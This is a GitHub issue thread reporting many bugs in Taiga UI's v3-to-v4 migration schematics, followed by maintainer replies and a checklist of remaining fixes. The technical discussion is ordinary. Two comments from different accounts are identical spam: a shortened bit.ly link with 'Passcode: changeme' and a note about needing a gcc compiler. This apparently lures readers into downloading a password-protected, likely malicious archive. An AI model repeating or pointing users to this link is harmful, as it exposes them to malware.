### ISSUE TITLE
🐞 - `v4` migration schema issues

### ISSUE THREAD

**Issue by hakimio** [taiga-family/taiga-ui#8839]
### Description

Noticed the following issues while migrating application from `v3` to `v4`:
- `--tui-text-primary` is not a valid replacement for `--tui-text-01-night`. Should just be replaced with `#fff`.
- `TuiEditorSocket` import added with `TuiEditor` import when `TuiEditorSocket` is not used.
- `[items]="items | tuiFilterByInput` is not a valid replacement for `[items]="items | tuiFilterByInputWith: $any(getDisplayValue)"`. There should be at least a `TODO` note.
- Following:
```html
<label tuiLabel>FooBar</label>
```
is not a valid migration for:
```html
<label tuiLabel="Foo">Bar</label>
```
should be the following instead:
```html
<label tuiLabel>
    <span tuiTitle>
        <span tuiSubtitle>Foo</span>
        Bar
    </span>
</label>
```
- `TuiPreviewActionModule` should be automatically removed.
- Missing migration for `tuiHintAppearance="onDark"`. Should be replaced with `tuiHintAppearance="dark"`
- Following icons are replaced with incorrect replacements: `tuiIconEdit`, `tuiIconUploadCloudLarge`, `tuiIconGitCommit`
- `appearance="secondary-destructive"` is not migrated
- Incorrect `TODO` message is added next to `text-overflow()` sass mixin imports:
```
// TODO: this mixin was deleted. Replace it with inline styles. Find it source code in
```
The mixin was not deleted. You can still find it:
https://github.com/taiga-family/taiga-ui/blob/6ec662f15bcff6b86b10d12c73d3fc866d16a99e/projects/core/styles/mixins/mixins.scss#L102
- `[pseudoFocus]` migration in some cases results in `tuiAppearanceFocus is not provided by any component or directive` error
- Missing migrations for `TuiOptionComponent` (-> `TuiOption`), `TuiPrimitiveTextfieldComponent` (-> `TuiPrimitiveTextfield`), `TuiEditorTool` (`TuiEditorToolType`) and other component and type classes.
- `box-shadow: var(--tui-shadow-navigation);` is migrated to `box-shadow: var(var(var(--tui-shadow-small) -small));`
- `[pseudoActive]="isMenuOpen() || null"` is migrated to `[tuiAppearanceState]="isMenuOpen() || null ? 'active' : null"`. Should be simply `[tuiAppearanceState]="isMenuOpen() ? 'active' : null"`.
- Missing migration for `clearbtn` sass mixin
- `tuiMode="onLight"` is incorrectly migrated to `tuiTheme="light"`. Should be `tuiAppearance="icon"` or `appearance="icon"` depending on the tag/component.
- Missing migration for `EventPluginsModule` (-> `NG_EVENT_PLUGINS`)
- Missing migrations for `TUI_DATE_SEPARATOR` and `TUI_NUMBER_FORMAT`
- No replacement for `TUI_DIALOG_CLOSES_ON_BACK`
- `TuiDialogModule`, `TuiAlertModule`, `TuiPreviewModule` `TuiPdfViewerModule` modules are not removed from global providers.
- `tui-input-number` `decimal` attribute migration is completely broken. Produces broken code and assigns `decimalMode` to non-existant `never` mode.
![image](https://github.com/user-attachments/assets/c86c814b-f53c-4c02-8d5d-97007ca52e93)
![image](https://github.com/user-attachments/assets/c85e0355-1ce7-49e4-9914-f4dc061ba08c)

### Angular version

18.2

### Taiga UI version

4

### Which browsers have you used?

- [X] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Edge

### Which operating systems have you used?

- [ ] macOS
- [X] Windows
- [ ] Linux
- [ ] iOS
- [ ] Android

**Comment by andersonsilva87** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by hakimio** [comment]
That's fine.
What should be the correct replacement for decimal mode `never` when using the new `tuiNumberFormat`?

**Comment by waterplea** [comment]
> That's fine. What should be the correct replacement for decimal mode `never` when using the new `tuiNumberFormat`?

I believe `precision: 0`

**Comment by vladimirpotekhin** [comment]
The remaining list to do:

- [ ] check color variables for replacement
- [ ] migrate `secondary-destructive` appearance (or add TODO)
- [ ] add `TuiAppearance` directive when migrating `[pseudoFocus]` to `[tuiAppearanceFocus]`
- [ ] fix migration for `box-shadow: var(--tui-shadow-navigation);`
- [ ] check migration for `TUI_DATE_SEPARATOR` and `TUI_NUMBER_FORMAT`
- [ ] remove / add TODO for `TUI_DIALOG_CLOSES_ON_BACK`
- [ ] fix migration `decimal="never"` migration ( this should migrate to `{ precision: 0 }` )
